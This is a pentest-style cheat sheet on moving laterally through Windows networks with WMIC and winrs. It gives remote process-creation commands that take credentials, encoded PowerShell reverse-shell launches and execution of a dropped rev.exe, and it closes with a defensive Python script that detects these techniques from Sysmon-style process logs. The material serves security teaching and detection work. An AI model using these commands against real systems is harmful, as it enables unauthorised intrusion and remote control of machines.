
💥 WMI & WinRM


WMIC

🧠 What’s the Deal?

WMIC (Windows Management Instrumentation Command-line) is a built-in Windows tool that lets administrators (or attackers) interact with WMI. Attackers abuse it for lateral movement because it needs no extra files dropped on the target (living-off-the-land).

The attacker uses WMIC to remotely create a process on another machine in the network.


🧰 Gear Up (Prereqs)

There are certain requirements for this attack to work:

  • Credentials of a domain user (member of local Administrators group)
  • Network connectivity to target over TCP 135 (RPC) and TCP 445 (SMB)
  • Remote WMI & DCOM access allowed (often open in AD).
  • Transfer the wmic tool to the Windows machine if it is not already present.

Quick checks before Exploitation

Before diving into exploitation, check whether you can execute commands on the target and whether you have the relevant access.

Check Group Memberships

  • Remote Management Users → required for WinRM.
  • Distributed COM Users → required for WMI.
  • Administrators / Domain Admins → best case, gives full control.
Get-DomainGroupMember -Identity "Remote Management Users"
Get-DomainGroupMember -Identity "Distributed COM Users"

Checking Network Access

Test-NetConnection -ComputerName 192.168.206.97 -Port 5985

Check if WinRM is enabled (note: winrm quickconfig configures the local WinRM service, listener and firewall rule rather than only reporting status; it reports that the service is already running if WinRM is set up)

winrm quickconfig

Checking WMI

wmic /node:TARGET_IP /user:DOMAIN\User /password:Pass123 os get caption

Or, with a PowerShell command:

Get-WmiObject -Class Win32_OperatingSystem -ComputerName TARGET -Credential DOMAIN\User

Checking WinRM

winrs -r:TARGET_IP -u:DOMAIN\User -p:Pass123 ipconfig

Or, with a PowerShell command:

Enter-PSSession -ComputerName TARGET -Credential DOMAIN\User

🚀 Launch Sequence (How-To)

Use the commands below to create a new process on the target and execute commands.

Using the wmic tool

  1. To execute commands
wmic /node:TARGET_IP /user:DOMAIN\user /password:Pass123 process call create "cmd.exe /c whoami"
  • /node: → target system
  • /user: and /password: → credentials
  • process call create → creates a process remotely
  • This runs whoami on the target and returns results.
  2. To get a reverse shell using PowerShell
wmic /node:TARGET process call create "powershell -enc <base64_payload>"
  3. To execute binaries on the remote machine
wmic /node:TARGET_IP process call create "C:\Users\Public\rev.exe"

Using the winrs tool

It’s like WMIC, but instead of WMI/DCOM it uses WinRM (Windows Remote Management) over HTTP/HTTPS (ports 5985 / 5986).

PreReq

  • Valid credentials (domain/local user).
  • Target machine must have WinRM enabled (default on servers, often disabled on workstations).
  • User must be a member of the “Remote Management Users” group or be an administrator on the target.

Commands

  1. Executing commands
winrs -r:TARGET_IP -u:DOMAIN\user -p:Password123 "ipconfig /all"
  • -r: → target host (IP or hostname).
  • -u: and -p: → credentials.
  • The quoted part is the command executed remotely.
  2. Executing binaries (like a reverse shell)
winrs -r:TARGET_IP "C:\Users\Public\rev.exe"
  3. Running PowerShell commands (for a reverse shell)
winrs -r:TARGET_IP -u:DOMAIN\user -p:Password123 "powershell -nop -w hidden -e <base_64_enc_PS_Command>"
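From the defender's side, both the wmic and the winrs techniques above leave a distinctive process tree on the target: a process created through wmic process call create is spawned by the WMI provider host, WmiPrvSE.exe, and a command run through winrs (or PowerShell remoting) is spawned by the WinRM provider host, wsmprovhost.exe. The Python script below is an added detection example, not part of the original page; it runs that parent-process rule over a few constructed Sysmon Event ID 1 (ProcessCreate) style records and additionally flags encoded PowerShell command lines like the -enc / -e payloads shown in both sections. The field names (Image, ParentImage, CommandLine, User, Computer) follow Sysmon's, but the records, the host and user names, and the BASE64_PLACEHOLDER value are invented for the example, and the allowlist is a hypothetical tuning hook.

```python
"""Detect process creations that originate from remote WMI or WinRM requests.

Added example (not from the original page). Records mimic Sysmon Event ID 1
(ProcessCreate) fields; the sample events below are constructed, not real logs.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set, Tuple

# Parent images that host remotely requested process creation on the target.
# Well-known Windows paths, compared case-insensitively.
REMOTE_EXEC_PARENTS = {
    r"c:\windows\system32\wbem\wmiprvse.exe": "WMI",   # wmic ... process call create (DCOM/RPC)
    r"c:\windows\system32\wsmprovhost.exe": "WinRM",   # winrs / Enter-PSSession (HTTP 5985, HTTPS 5986)
}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...).
ENCODED_PS = re.compile(r"(?i)\bpowershell(?:\.exe)?\b.*\s-(?:e|ec|en|enc|encodedcommand)\b")

# Hypothetical allowlist of (parent, child) pairs that are legitimate in a given
# environment, e.g. inventory agents; empty by default so every match is reported.
DEFAULT_ALLOWLIST: Set[Tuple[str, str]] = set()


@dataclass
class Alert:
    host: str
    technique: str        # "WMI" or "WinRM"
    user: str
    image: str
    command_line: str
    encoded_powershell: bool


def analyze(events: Iterable[dict], allowlist: Set[Tuple[str, str]] = DEFAULT_ALLOWLIST) -> List[Alert]:
    """Return one Alert per ProcessCreate event whose parent is a remote-execution host."""
    alerts: List[Alert] = []
    for ev in events:
        if ev.get("EventID") != 1:          # only ProcessCreate records carry a parent image
            continue
        parent = ev.get("ParentImage", "").lower()
        image = ev.get("Image", "").lower()
        technique: Optional[str] = REMOTE_EXEC_PARENTS.get(parent)
        if technique is None or (parent, image) in allowlist:
            continue
        cmd = ev.get("CommandLine", "")
        alerts.append(Alert(
            host=ev.get("Computer", "?"),
            technique=technique,
            user=ev.get("User", "?"),
            image=ev.get("Image", ""),
            command_line=cmd,
            encoded_powershell=bool(ENCODED_PS.search(cmd)),
        ))
    return alerts


# Constructed sample events modelled on the commands in the text above.
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS01.corp.local", "User": "CORP\\jdoe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},                     # wmic process call create
    {"EventID": 1, "Computer": "WS01.corp.local", "User": "CORP\\jdoe",
     "ParentImage": r"C:\Windows\System32\wsmprovhost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -e BASE64_PLACEHOLDER"},  # winrs + encoded PS
    {"EventID": 1, "Computer": "WS01.corp.local", "User": "CORP\\jdoe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},                           # benign interactive launch
    {"EventID": 1, "Computer": "WS01.corp.local", "User": "CORP\\jdoe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Users\Public\rev.exe",
     "CommandLine": r"C:\Users\Public\rev.exe"},              # wmic launching a dropped binary
    {"EventID": 3, "Computer": "WS01.corp.local",             # network event: no parent, skipped
     "Image": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "DestinationPort": 135},
]


def demo() -> List[Alert]:
    return analyze(SAMPLE_EVENTS)


if __name__ == "__main__":
    for a in demo():
        flag = " [encoded PowerShell]" if a.encoded_powershell else ""
        print(f"{a.host}: {a.technique} remote execution as {a.user}: {a.command_line}{flag}")
```

Windows Security event 4688 carries the same parent in its Creator Process Name field once command-line auditing is enabled, so the rule transfers unchanged to that source. Legitimate management tooling also spawns children of WmiPrvSE.exe and wsmprovhost.exe, which is why the allowlist exists: tuning happens by adding known-good (parent, child) pairs there, not by dropping the parent-process rule itself.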